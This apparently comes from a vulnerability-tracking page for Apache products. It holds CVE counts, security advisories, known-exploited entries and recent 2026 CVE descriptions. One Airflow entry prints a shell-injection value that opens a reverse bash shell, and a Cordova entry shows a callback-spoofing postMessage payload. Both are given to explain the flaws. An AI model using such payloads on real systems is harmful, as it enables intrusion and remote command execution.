Apache (The Apache Software Foundation): Security Vulnerabilities


Products by Apache, sorted by most security vulnerabilities since 2018

Product | Vulnerabilities
Apache HTTP Server | 307
Apache AirFlow | 176
Apache Tomcat (JEE-compliant servlet container) | 176
Apache Traffic Server | 73
Apache Superset | 68
Apache OFBiz | 60
Apache ActiveMQ | 56
Apache OpenOffice | 54
Apache NiFi | 46
Apache CXF | 46
Apache Solr (search engine written in Java) | 43
Apache Camel | 37
Apache Struts | 37
Apache InLong | 32
Apache CloudStack | 32
Apache DolphinScheduler | 27
Apache JSPWiki | 24
Apache Tika | 24
Apache Kafka | 23
Apache Hive | 23
Apache Zeppelin | 22
Apache Openmeetings | 22
Apache Spark | 21
Apache Kylin | 21
Apache Hadoop | 21
Apache Shiro | 21
Apache Pulsar | 20
Apache Geode | 19
Apache Fineract | 19
Apache Linkis | 18
Apache Log4j | 18
Apache Thrift | 18
Apache Iotdb | 18
Apache Streampark | 17
Apache Ambari | 17
Apache Answer | 17
Apache Zookeeper | 17
Apache Hertzbeat | 16
Apache Cassandra | 16
Apache Syncope | 16
Apache Activemq Artemis | 15
Apache James | 15
Apache JMeter | 14
Apache Guacamole | 13
Apache Apisix | 13
Apache Druid | 13
Apache Karaf | 12
Apache Archiva | 12
Apache Commons Compress | 12
Apache Subversion | 12
Apache Ozone | 11
Apache Ranger | 11
Apache Batik | 10
Apache Wicket | 10
Apache Couchdb | 10
Apache Storm | 9
Apache Pdfbox | 9
Apache Mina | 9
Apache Mesos | 9
Apache Ignite | 9
Apache Portable Runtime | 9
Apache Roller | 8
Apache Httpclient | 8
Apache Avro | 8
Apache Traffic Control | 8
Apache Drill | 8
Apache Apr Util | 7
Apache Impala | 7
Apache Streampipes | 7
Apache Nuttx | 6
Apache Jena | 6
Apache Allura | 6
Apache Xerces C | 6
Apache Brpc | 6
Apache Commons Configuration | 6
Apache Commons Fileupload | 6
Apache Doris | 6
Apache Seata | 5
Apache Nimble | 5
Apache Submarine | 5
Apache Poi | 5
Apache Arrow | 5
Apache Atlas | 5
Apache Axis | 5
Apache Groovy | 5
Apache Kvrocks | 4
Apache RocketMQ | 4

Recent Apache Security Advisories

Advisory | Title | Published
2.4.68 | 13 Vulnerabilities Fixed in Apache HTTP Server 2.4.68 | June 8, 2026
2.4.67 | 11 Vulnerabilities Fixed in Apache HTTP Server 2.4.67 | May 4, 2026
2.4.66 | 5 Vulnerabilities Fixed in Apache HTTP Server 2.4.66 | December 4, 2025
2.4.65 | Vulnerability Fixed in Apache HTTP Server 2.4.65 | July 23, 2025
2.4.64 | 8 Vulnerabilities Fixed in Apache HTTP Server 2.4.64 | July 10, 2025
2.4.62 | 2 Vulnerabilities Fixed in Apache HTTP Server 2.4.62 | July 17, 2024
2.4.61 | Vulnerability Fixed in Apache HTTP Server 2.4.61 | July 16, 2024
2.4.60 | 8 Vulnerabilities Fixed in Apache HTTP Server 2.4.60 | July 15, 2024
2.4.59 | 3 Vulnerabilities Fixed in Apache HTTP Server 2.4.59 | April 4, 2024
2.4.58 | 4 Vulnerabilities Fixed in Apache HTTP Server 2.4.58 | October 19, 2023

Known Exploited Apache Vulnerabilities

The following Apache vulnerabilities have recently been marked by CISA as Known to be Exploited by threat actors.

Each entry: CVE | Added to KEV | Exploit probability (EPSS), followed by the title and description.

CVE-2026-34197 | April 16, 2026 | 83.5%
Apache ActiveMQ Improper Input Validation Vulnerability
Apache ActiveMQ contains an improper input validation vulnerability that allows for code injection.

CVE-2024-38475 | May 1, 2025 | 93.9%
Apache HTTP Server Improper Escaping of Output Vulnerability
Apache HTTP Server contains an improper escaping of output vulnerability in mod_rewrite that allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure.

CVE-2025-24813 | April 1, 2025 | 94.1%
Apache Tomcat Path Equivalence Vulnerability
Apache Tomcat contains a path equivalence vulnerability that allows a remote attacker to execute code, disclose information, or inject malicious content via a partial PUT request.

CVE-2024-45195 | February 4, 2025 | 94.1%
Apache OFBiz Forced Browsing Vulnerability
Apache OFBiz contains a forced browsing vulnerability that allows a remote attacker to obtain unauthorized access.

CVE-2024-27348 | September 18, 2024 | 94.3%
Apache HugeGraph-Server Improper Access Control Vulnerability
Apache HugeGraph-Server contains an improper access control vulnerability that could allow a remote attacker to execute arbitrary code.

CVE-2024-38856 | August 27, 2024 | 94.4%
Apache OFBiz Incorrect Authorization Vulnerability
Apache OFBiz contains an incorrect authorization vulnerability that could allow remote code execution via a Groovy payload in the context of the OFBiz user process by an unauthenticated attacker.

CVE-2024-32113 | August 7, 2024 | 94.0%
Apache OFBiz Path Traversal Vulnerability
Apache OFBiz contains a path traversal vulnerability that could allow for remote code execution.

CVE-2020-17519 | May 23, 2024 | 94.3%
Apache Flink Improper Access Control Vulnerability
Apache Flink contains an improper access control vulnerability that allows an attacker to read any file on the local filesystem of the JobManager through its REST interface.

CVE-2023-27524 | January 8, 2024 | 84.0%
Apache Superset Insecure Default Initialization of Resource Vulnerability
Apache Superset contains an insecure default initialization of a resource vulnerability that allows an attacker to authenticate and access unauthorized resources on installations that have not altered the default configured SECRET_KEY according to installation instructions.

CVE-2023-46604 | November 2, 2023 | 94.4%
Apache ActiveMQ Deserialization of Untrusted Data Vulnerability
Apache ActiveMQ contains a deserialization of untrusted data vulnerability that may allow a remote attacker with network access to a broker to run shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.

CVE-2023-33246 | September 6, 2023 | 94.4%
Apache RocketMQ Command Execution Vulnerability
Several components of Apache RocketMQ, including NameServer, Broker, and Controller, are exposed to the extranet and lack permission verification. An attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as, or achieve the same effect by forging the RocketMQ protocol content.

CVE-2016-8735 | May 12, 2023 | 93.8%
Apache Tomcat Remote Code Execution Vulnerability
Apache Tomcat contains an unspecified vulnerability that allows for remote code execution if JmxRemoteLifecycleListener is used and an attacker can reach Java Management Extension (JMX) ports. This CVE exists because this listener wasn't updated for consistency with the Oracle patched issues for CVE-2016-3427 which affected credential types.

CVE-2021-45046 | May 1, 2023 | 94.3%
Apache Log4j2 Deserialization of Untrusted Data Vulnerability
Apache Log4j2 contains a deserialization of untrusted data vulnerability due to the incomplete fix of CVE-2021-44228, where the Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.

CVE-2022-33891 | March 7, 2023 | 93.5%
Apache Spark Command Injection Vulnerability
Apache Spark contains a command injection vulnerability via the Spark User Interface (UI) when Access Control Lists (ACLs) are enabled.

CVE-2022-24112 | August 25, 2022 | 94.4%
Apache APISIX Authentication Bypass Vulnerability
Apache APISIX contains an authentication bypass vulnerability that allows for remote code execution.

CVE-2022-24706 | August 25, 2022 | 94.4%
Apache CouchDB Insecure Default Initialization of Resource Vulnerability
Apache CouchDB contains an insecure default initialization of resource vulnerability which can allow an attacker to escalate to administrative privileges.

CVE-2020-1956 | March 25, 2022 | 93.7%
Apache Kylin OS Command Injection Vulnerability
Apache Kylin contains an OS command injection vulnerability which could permit an attacker to perform remote code execution.

CVE-2013-2251 | March 25, 2022 | 94.3%
Apache Struts Improper Input Validation Vulnerability
Apache Struts allows remote attackers to execute arbitrary Object-Graph Navigation Language (OGNL) expressions.

CVE-2017-12615 | March 25, 2022 | 94.2%
Apache Tomcat on Windows Remote Code Execution Vulnerability
When running Apache Tomcat on Windows with HTTP PUTs enabled, it is possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

CVE-2017-12617 | March 25, 2022 | 94.4%
Apache Tomcat Remote Code Execution Vulnerability
When running Apache Tomcat, it is possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

Of the known exploited vulnerabilities above, 20 are in the top 1%, or the 99th percentile of the EPSS exploit probability rankings.

Top 10 Riskiest Apache Vulnerabilities

Based on the current exploit probability, these Apache vulnerabilities are on CISA's Known Exploited vulnerabilities list (KEV) and are ranked by the current EPSS exploit probability.

Rank | CVE | EPSS | Vulnerability
1 | CVE-2019-17558 | 94.5% | Apache Solr 5.0.0-8.3.1 Remote Code Execution Vulnerability
2 | CVE-2020-1938 | 94.5% | Apache Tomcat Improper Privilege Management Vulnerability
3 | CVE-2022-24112 | 94.4% | Apache APISIX Authentication Bypass Vulnerability
4 | CVE-2023-46604 | 94.4% | Apache ActiveMQ Deserialization of Untrusted Data Vulnerability
5 | CVE-2021-40438 | 94.4% | Apache HTTP Server-Side Request Forgery (SSRF)
6 | CVE-2018-11776 | 94.4% | Apache Struts 2.3 to 2.3.34 and 2.5 to 2.5.16 Remote Code Execution Vulnerability
7 | CVE-2021-42013 | 94.4% | Apache HTTP Server 2.4.49 and 2.4.50 Path Traversal
8 | CVE-2021-41773 | 94.4% | Apache HTTP Server Path Traversal Vulnerability
9 | CVE-2023-33246 | 94.4% | Apache RocketMQ Command Execution Vulnerability
10 | CVE-2022-24706 | 94.4% | Apache CouchDB Insecure Default Initialization of Resource Vulnerability

By the Year

In 2026 there have been 293 vulnerabilities in Apache products, with an average score of 7.2 out of ten. Last year, in 2025, Apache had 229 security vulnerabilities published, so 64 more vulnerabilities have already been reported in 2026 than in all of last year. Last year's average CVE base score was greater by 0.06.

Year | Vulnerabilities | Average Score
2026 | 293 | 7.22
2025 | 229 | 7.29
2024 | 275 | 7.45
2023 | 274 | 7.47
2022 | 228 | 7.63
2021 | 212 | 7.61
2020 | 160 | 7.56
2019 | 163 | 7.37
2018 | 155 | 7.24

It may take a day or so for new Apache vulnerabilities to show up in the stats or in the list of recent security vulnerabilities. Additionally, vulnerabilities may be tagged under a different product or component name.

Recent Apache Security Vulnerabilities

Each entry: CVE | Published | Product, followed by the vulnerability title and description.

CVE-2026-49818 | Jun 09, 2026 | AirFlow
Apache Airflow Samba Provider: Path Traversal via GCSToSambaOperator (<4.12.6)
The Apache Airflow Samba provider's `GCSToSambaOperator` joined GCS object names to the SMB destination path without a containment check, so an object named with `../` segments resolved to a write path outside the configured `destination_path`. An attacker able to write objects into the source GCS bucket (typically an external data producer distinct from the trusted DAG author) could write files to arbitrary locations on the Samba target when the operator ran. Upgrade apache-airflow-providers-samba to 4.12.6 or later, which validates that the resolved destination stays within `destination_path`.

CVE-2026-34905 | Jun 09, 2026 | Answer
Apache Answer 2.0.0: Unrestricted Unlisted Questions API Disclosure
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Answer. This issue affects Apache Answer through 2.0.0. The unlisted question feature did not enforce access restrictions on direct API endpoints, allowing authenticated users to discover and access unlisted questions, their answers, comments, and revision history. Users are recommended to upgrade to version 2.0.1, which fixes the issue.

CVE-2026-34033 | Jun 09, 2026 | Answer
Apache Answer 2.0.0: XSS via Unescaped HTML in Email Notifications
Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Apache Answer. This issue affects Apache Answer through 2.0.0. User-supplied content was included in notification emails without proper escaping, allowing authenticated users to inject arbitrary HTML into emails sent to other users. Users are recommended to upgrade to version 2.0.1, which fixes the issue.

CVE-2026-34031 | Jun 09, 2026 | Answer
Apache Answer 2.0.0: Unrestricted Upload of External Image URL
Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer. This issue affects Apache Answer through 2.0.0. The server did not sufficiently validate user-supplied image URLs, allowing arbitrary external content to be embedded as profile images, which could expose users to unintended external requests and tracking by third-party servers. Users are recommended to upgrade to version 2.0.1, which fixes the issue.

CVE-2026-33582 | Jun 09, 2026 | Answer
Apache Answer 2.0.0: Unrestricted Upload of File with Dangerous Type
Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer. This issue affects Apache Answer through 2.0.0. A crafted TIFF image could trigger excessive memory allocation during image decoding, allowing an authenticated user to cause the server process to crash. Users are recommended to upgrade to version 2.0.1, which fixes the issue.

CVE-2026-25699 | Jun 09, 2026 | Answer
Apache Answer <2.0.0: Privileged Data Leak via Timeline API
Exposure of Private Personal Information to an Unauthorized Actor vulnerability in Apache Answer. This issue affects Apache Answer through 2.0.0. Timeline-related APIs lacked proper authorization checks, allowing regular authenticated users to access deleted, private, or unapproved content and its revision history. Users are recommended to upgrade to version 2.0.1, which fixes the issue.

CVE-2026-25688 | Jun 09, 2026 | Answer
Apache Answer XSS: Improper Neutralization of Alternate XSS Syntax, Fixed in 2.0.1
Improper Neutralization of Alternate XSS Syntax vulnerability in Apache Answer. This issue affects Apache Answer through 2.0.0. AI-generated response content was rendered in the browser without proper sanitization, allowing malicious scripts to be executed when the content was viewed. Users are recommended to upgrade to version 2.0.1, which fixes the issue.
CVE-2026-49975 | Jun 08, 2026 | HTTP Server
Apache HTTP Server 2.4.17-2.4.67: mod_http DoS via Excessive Memory Allocation
Memory Allocation with Excessive Size Value vulnerability in Apache HTTP Server's mod_http leads to denial of service via malicious HTTP requests. This issue affects Apache HTTP Server from 2.4.17 through 2.4.67.

CVE-2026-48913 | Jun 08, 2026 | HTTP Server
Apache HTTP Server 2.4.55-2.4.67: mod_http2 Use-After-Free with Exhausted File Handles
Use After Free vulnerability in the Apache HTTP Server module mod_http2 when file handles are already exhausted. This issue affects Apache HTTP Server from 2.4.55 through 2.4.67.

CVE-2026-42536 | Jun 08, 2026 | HTTP Server
Apache HTTP Server 2.4.0-2.4.67: Heap Overflow in mod_xml2enc (fixed in 2.4.68)
Heap-based Buffer Overflow vulnerability in Apache HTTP Server with mod_xml2enc, xml2StartParse, and untrusted content. This issue affects Apache HTTP Server from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue.

CVE-2026-44185 | Jun 08, 2026 | HTTP Server
Apache HTTP Server 2.4.0-2.4.67: OCSP Outbound Buffer Over-read
Buffer Over-read vulnerability in Apache HTTP Server via outbound OCSP requests to an attacker-controlled OCSP server. This issue affects Apache HTTP Server from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue.

CVE-2026-34355 | Jun 08, 2026 | HTTP Server
Apache HTTP Server 2.4.67 and earlier: mod_proxy_html Buffer Overflow
A buffer overflow in mod_proxy_html in Apache HTTP Server 2.4.67 and earlier allows an attack by an untrusted backend. Users are recommended to upgrade to version 2.4.68, which fixes this issue.

CVE-2026-44631 | Jun 08, 2026 | HTTP Server
Apache HTTP Server 2.4.0-2.4.67: Buffer Underwrite via Regular Expressions
Buffer Underwrite vulnerability in Apache HTTP Server on crafted regular expressions in the configuration. This issue affects Apache HTTP Server from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue.

CVE-2026-44119 | Jun 08, 2026 | HTTP Server
Apache HTTP Server 2.4.67 and earlier: Improper Privilege Management in .htaccess (fixed in 2.4.68)
Improper Privilege Management vulnerability in Apache HTTP Server 2.4.67 and earlier allows local .htaccess authors to read files with the privileges of the httpd user. This issue affects Apache HTTP Server through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue.

CVE-2026-43951 | Jun 08, 2026 | HTTP Server
Apache HTTP Server <= 2.4.67: Out-of-bounds Read in mod_headers/mod_mime
Out-of-bounds Read vulnerability in Apache HTTP Server with mod_headers and mod_mime and multiple response languages. This issue affects Apache HTTP Server from 2.4.0 through 2.4.67.

CVE-2026-42535 | Jun 08, 2026 | HTTP Server
Apache HTTP Server 2.4.67 and earlier: Path Handling Vulnerability in mod_dav_fs (fixed in 2.4.68)
A path handling issue in mod_dav_fs in Apache HTTP Server 2.4.67 and earlier allows a WebDAV content author to directly manipulate trusted DAV property databases, potentially causing child process crashes. Users are recommended to upgrade to version 2.4.68, which fixes this issue.

CVE-2026-34356 | Jun 08, 2026 | HTTP Server
Apache HTTP Server 2.4.0-2.4.67: Heap Buffer Overflow via ProxyPassReverseCookie*
Heap-based Buffer Overflow vulnerability in Apache HTTP Server with malicious backend servers and ProxyPassReverseCookie* directives. This issue affects Apache HTTP Server from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue.

CVE-2026-44186 | Jun 08, 2026 | HTTP Server
Apache HTTP Server 2.4.0-2.4.67: mod_proxy_ftp Infinite Loop (fixed in 2.4.68)
Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in the mod_proxy_ftp module in Apache HTTP Server with an attacker-controlled backend FTP server. This issue affects Apache HTTP Server from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue.

CVE-2026-29170 | Jun 08, 2026 | HTTP Server
Apache HTTP Server 2.4.67 and earlier: XSS in mod_proxy_ftp Directory List Generation
A cross-site scripting vulnerability exists in mod_proxy_ftp's HTML directory list generation in Apache HTTP Server 2.4.67 and earlier when listing FTP directory contents via either a forward or a reverse proxy configuration. Users are recommended to upgrade to version 2.4.68, which fixes this issue.

CVE-2026-29167 | Jun 08, 2026 | HTTP Server
Apache HTTP Server 2.4.0-2.4.67: Use-After-Free in mod_ldap (per-directory configuration), fixed in 2.4.68
Use After Free vulnerability in Apache HTTP Server with mod_ldap in per-directory configuration. This issue affects Apache HTTP Server from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue.
CVE-2026-47430 | Jun 08, 2026
iOS Cordova InAppBrowser 3.1.0-6.0.0: Remote Callback Injection
Summary: The iOS implementation of `cordova-plugin-inappbrowser` passes the `id` field from a `WKScriptMessage` body to `commandDelegate sendPluginResult:callbackId:` with no format validation (`CDVWKInAppBrowser.m:560-574`). Any web content loaded inside the InAppBrowser can fire any pending Cordova callback in the host app by posting a message whose `id` field is a guessable or enumerated callback identifier. An attack abusing this weakness must be tailored to the specific plugins and callback IDs the host app uses, though an attacker with knowledge of common Cordova plugin configurations could craft reusable payloads targeting widely adopted plugins.
Impact: An unauthenticated remote attacker who controls content displayed in the InAppBrowser, via a URL the app opens (OAuth redirect, marketing link, deep-link target) or network interception, can call `window.webkit.messageHandlers.cordova_iab.postMessage({id: '<victim-callback-id>', d: '...'})` to fire callbacks belonging to any other installed Cordova plugin (Camera, Contacts, File, Geolocation). Cordova callback IDs follow the predictable format `<PluginName><sequential-integer>`, making enumeration feasible. Successful exploitation allows the attacker to spoof plugin results across trust boundaries, for example injecting a forged camera approval, a fabricated contacts list, or a crafted file-read response. This issue affects Cordova Plugin InAppBrowser from 3.1.0 through 6.0.0. Users are recommended to upgrade to version 6.0.1, which fixes the issue.
CVE-2026-50076 | Jun 04, 2026 | Fory
Apache Fory fory-core Java SDK <1.1.0: Deserialization of Untrusted Data
Deserialization of Untrusted Data in the Java replace-resolve path in the Apache Fory fory-core Java SDK before 1.1.0 on Java/JVM platforms allows a remote attacker to bypass class registration, TypeChecker, and DisallowedList checks and invoke classpath-present readResolve/readExternal hooks via crafted Fory serialized data. Users are recommended to upgrade to version 1.1.0 or later, which fixes this issue.

CVE-2026-47065 | Jun 03, 2026 | Mina
Java Deserialization Proxy Class Bypass (resolveProxyClass Not Overridden)
ZDRES-232: resolveProxyClass Not Overridden; acceptMatchers Filter Bypass via java.lang.reflect.Proxy. Assessment: Fully addressed. When the serialised stream contains a TC_PROXYCLASSDESC (the marker for a java.lang.reflect.Proxy), the JDK's ObjectInputStream.readProxyDesc() is dispatched. The JDK then calls the default ObjectInputStream.resolveProxyClass(interfaces) implementation, which performs Class.forName(intf, false, latestUserDefinedLoader()) for EACH interface name and constructs the proxy class, bypassing the accepted classes list.
ZDRES-233: Class.forName(name, initialize=true, classLoader) in readClassDescriptor Triggers Static Initialiser of Allow-Listed Classes. Assessment: Fully addressed. For ANY class on the allow-list, deserialising a stream that names it triggers the class's <clinit> (static initialiser) BEFORE any instance is constructed. This means an attacker who supplies a class name on the allow-list (e.g., the developer wrote accept("com.myapp.*") and the attacker supplies com.myapp.SomeClass) causes <clinit> of SomeClass to run, and many real-world classes have side-effecting static initialisers. Both issues have been fixed.

CVE-2026-46718 | Jun 02, 2026 | Calcite
Apache Calcite <1.42: Unsafe Reflection via External Input
Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Apache Calcite. This issue affects Apache Calcite from 1.5.0 before 1.42. Users are recommended to upgrade to version 1.42, which fixes the issue.
CVE-2026-41115 | Jun 02, 2026 | Kafka
Apache Kafka Improper Authorization: CONSUMER_GROUP_DESCRIBE API ACL Mismatch
An improper authorization vulnerability has been identified in Apache Kafka. The implementation of the CONSUMER_GROUP_DESCRIBE (69) API validates the DESCRIBE operation on the GROUP resource instead of the READ operation that is documented in the official Kafka documentation and in KIP-848. This discrepancy can result in misconfigured Access Control Lists (ACLs) and unintended security postures, such as granting READ permission to users who should not be able to join/sync groups, or allowing users without READ permission (but with DESCRIBE permission) to access sensitive group metadata. The correct permission for the CONSUMER_GROUP_DESCRIBE API is DESCRIBE GROUP, so the current implementation is correct; however, the Kafka documentation as well as KIP-848 will be updated to reflect the correct permission. We advise Kafka users to review existing group ACLs to ensure the principle of least privilege.

CVE-2026-49328 | Jun 01, 2026
SSRF in Apache Fesod fesod-sheet UrlImageConverter before 2.0.2-incubating
Server-Side Request Forgery (SSRF) in the UrlImageConverter component of Apache Fesod (Incubating) fesod-sheet before 2.0.2-incubating allows attackers to cause outbound network requests to internal or otherwise restricted resources via a user-supplied image URL. Users are recommended to upgrade to version 2.0.2-incubating, which fixes this issue.

CVE-2026-48827 | Jun 01, 2026 | Mina Sshd
Apache MINA SSHD sshd-git: Path Traversal via Git Operations (fixed in 2.18.0)
Path traversal vulnerability in the Apache MINA SSHD bundle sshd-git. Lack of path validation in git-upload-pack, git-receive-pack, and other git operations allows users authenticated over SSH to access git repositories outside the configured git server root directory. Applications are affected if they use org.apache.sshd:sshd-git; applications not using sshd-git are not affected. Users are advised to upgrade affected applications to Apache MINA SSHD 2.18.0, which fixes the issue. The issue is also present in the pre-release milestones 3.0.0-M1 to 3.0.0-M3 of the upcoming major version 3.0.0; again, applications are affected only if they use sshd-git. Upgrade affected applications to 3.0.0-M4. We would like to point out that a professional git server should not rely solely on file system layout and permissions, but should implement additional security controls to govern access to git repositories and the operations allowed on particular git repositories.

CVE-2026-44825 | Jun 01, 2026 | Solr
Apache Solr 9.4.0-9.10.1: Hardcoded BasicAuth Credentials via bin/solr auth enable
Hardcoded credentials in the Basic Authentication setup tool (bin/solr auth enable) in Apache Solr versions 9.4.0 through 9.10.1 and 10.0.0 allow a remote attacker to gain full administrative access to the cluster via publicly known default credentials installed silently alongside the user-specified account. As an immediate workaround without upgrading, delete the template users (superadmin, admin, search, index) from security.json or change their passwords. The future, not yet released, versions 9.11.0 and 10.1.0 will not be vulnerable, and upgrading to them will be enough to resolve the issue. Not affected:
* Clusters where bin/solr auth enable was not used to bootstrap BasicAuth
* Clusters where template users have been assigned strong passwords after bootstrap

CVE-2026-49361 | Jun 01, 2026
Apache Fluss before 0.9.1: DoS via Netty Frame Decoder Maximum Length
Apache Fluss versions prior to 0.9.1 configure the Netty LengthFieldBasedFrameDecoder with Integer.MAX_VALUE as the maximum frame length, allowing unauthenticated remote attackers to exhaust JVM heap memory on TabletServer and CoordinatorServer by sending specially crafted frame headers, resulting in denial of service. This issue affects Apache Fluss (incubating) 0.8.0 and 0.9.0. Users are recommended to upgrade to version 0.9.1, which fixes the issue.

CVE-2026-40861 | Jun 01, 2026 | AirFlow
Apache Airflow <3.2.2: Log Path Traversal via FileTaskHandler
A Dag author could either (a) create a symlink under their task's log directory pointing to an arbitrary file readable by the API server process (a read-path attack, e.g. `/etc/passwd` or `airflow.cfg`), or (b) supply a `task_id` containing `..` sequences accepted by the Task SDK's `KEY_REGEX` (a write-path attack); in both cases the FileTaskHandler resolves the log path outside the configured `base_log_folder`, leaking or overwriting arbitrary files. This only affects deployments where the worker log folder is shared with the API server. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. As a defense-in-depth mitigation, deploy the worker and API server with separate log volumes so that worker-controlled paths cannot reach the API server's filesystem.
CVE-2026-40961 Jun 01, 2026
Apache Airflow 3.2 Redirect Vulnerability in login route (bypass is_safe_url) A bug in the login redirect route in Apache Airflow allowed authenticated users to craft URLs that bypassed the `is_safe_url` check, enabling redirection from a trusted Airflow domain to an attacker-controlled origin. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. As a defense-in-depth mitigation, deployment operators can place Airflow behind a reverse proxy that strips off-domain `next=` query parameters before they reach the login endpoint.
AirFlow
CVE-2026-40963 Jun 01, 2026
Airflow UI structure_data Endpoint Exposes Linked Dag Info (before 3.2.2) The structure_data endpoint in the Airflow UI returned external dependency graph nodes for linked Dags without checking whether the caller had read permission on those linked Dags. An authenticated UI/API user authorized for one Dag could enumerate linked Dag IDs and dependency metadata for other Dags they were not authorized to read. Affects deployments that rely on per-Dag read scoping to keep Dag dependency topology private across teams. Users are advised to upgrade to `apache-airflow` 3.2.2 or later.
AirFlow
CVE-2026-41014 Jun 01, 2026
Apache Airflow 3.2.2 - Partitioned_Dag_Runs Asset-Level Access Bypass The partitioned_dag_runs endpoints in the Airflow UI enforced only asset-level access control, not per-Dag authorization. An authenticated UI/API user with global Asset:read permission could enumerate partition run state, schedule configuration, and asset wiring for Dags they were not authorized to read. Affects deployments that rely on per-Dag read scoping while granting users broader Asset access. Users are advised to upgrade to `apache-airflow` 3.2.2 or later.
AirFlow
CVE-2026-49267 Jun 01, 2026
Apache Airflow SMTP STARTTLS Cert Bypass before 3.2.2 Apache Airflow's EmailOperator and the underlying `airflow.utils.email` helpers established SMTP STARTTLS connections without verifying the remote certificate when the deployment used `[email] smtp_starttls=True` without `[email] smtp_ssl`. An attacker positioned between the worker and the configured SMTP server (network MITM typical hostile-network attack-surface for environments where the SMTP relay sits outside the worker's trust boundary) could present a self-signed certificate, have the worker complete the STARTTLS handshake silently, and capture the SMTP AUTH credentials and message contents the worker forwarded. This CVE covers the **core apache-airflow side** of the same root cause already covered for the SMTP provider by `CVE-2026-41016` (published 2026-04-27, covering `apache-airflow-providers-smtp`). Users who already applied the SMTP-provider fix from CVE-2026-41016 should additionally upgrade `apache-airflow` to 3.2.2 or later to cover the core-side path through `airflow.utils.email`. Affects deployments configured with `smtp_starttls=True` and `smtp_ssl=False` where the SMTP relay is reachable across a less-trusted network segment than the worker. Users are advised to upgrade to `apache-airflow` 3.2.2 or later.
AirFlow
CVE-2026-41017 Jun 01, 2026
Apache Airflow JWTRefreshMiddleware insecure cookie (no Secure flag) 3.2.x
Apache Airflow's `JWTRefreshMiddleware` set the JWT auth cookie without the `Secure` flag, so deployments running the Airflow API server behind an HTTPS-terminating reverse proxy (e.g. nginx / Envoy / a managed load balancer that terminates TLS and forwards plaintext to the API server, the default cloud-native topology) would have the user's session JWT replayed over any cleartext HTTP request to the same host. A network-positioned attacker (Wi-Fi MITM, hostile LAN, captive-portal proxy) could induce a logged-in user's browser to issue an HTTP request to the deployment's hostname and capture the JWT cookie out of that request, then replay it against the authenticated API. Affects deployments where the Airflow API server is reached through a TLS-terminating proxy and the cookie's secure-by-default protection is load-bearing for session integrity. Users are advised to upgrade to `apache-airflow` 3.2.2 or later.
AirFlow
CVE-2026-41084 Jun 01, 2026
Apache Airflow Bulk Task Instances API Auth Bypass (<=3.2.1)
Apache Airflow's bulk Task Instances API (`PATCH/DELETE /api/v2/dags/{dag_id}/dagRuns/{dag_run_id}/taskInstances`) evaluated authorization against the `dag_id` resolved from the URL path while operating on the `dag_id` / `dag_run_id` values extracted from the request-body entity fields. An authenticated UI/API user with edit permission on one Dag could mutate Task Instance state in any other Dag by keeping the authorized Dag's ID in the URL path and naming the target Dag's IDs in the request-body entities. Affects deployments that rely on per-Dag edit scope to keep Task Instance state isolated between teams. Users are advised to upgrade to `apache-airflow` 3.2.2 or later.
AirFlow
CVE-2026-42252 Jun 01, 2026
Apache Airflow 3.2.2 Shell Injection via Unquoted DAG Run Conf in BashOperator
Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129: the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.
AirFlow
CVE-2026-42360 Jun 01, 2026
Apache Airflow 3.2.2: Bypass of Nested Sensitive Key Masking in Rendered Fields
A bug in Apache Airflow's rendered-template field handling caused nested sensitive-key masking (e.g. nested `password` / `token` / `secret` / `api_key` keys inside a JSON template structure) to be bypassed when the rendered field exceeded `[core] max_templated_field_length`: Airflow stringified the structure before redaction, losing the nested key context, and persisted the plaintext value into `rendered_fields`. An authenticated UI/API user with permission to read rendered template fields could harvest secret values intended to be masked. Affects deployments where Dag authors pass structured JSON to operators with nested sensitive keys. This is a variant of `CWE-200` previously addressed for the user-registered `mask_secret()` patterns in CVE-2025-68438; that fix did not cover the nested sensitive-keyword allowlist. Users who already upgraded for CVE-2025-68438 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the nested-key path.
AirFlow
CVE-2026-42358 Jun 01, 2026
Apache Airflow Variable Masker Recursion Depth Bypass Vulnerable Secret Exposure
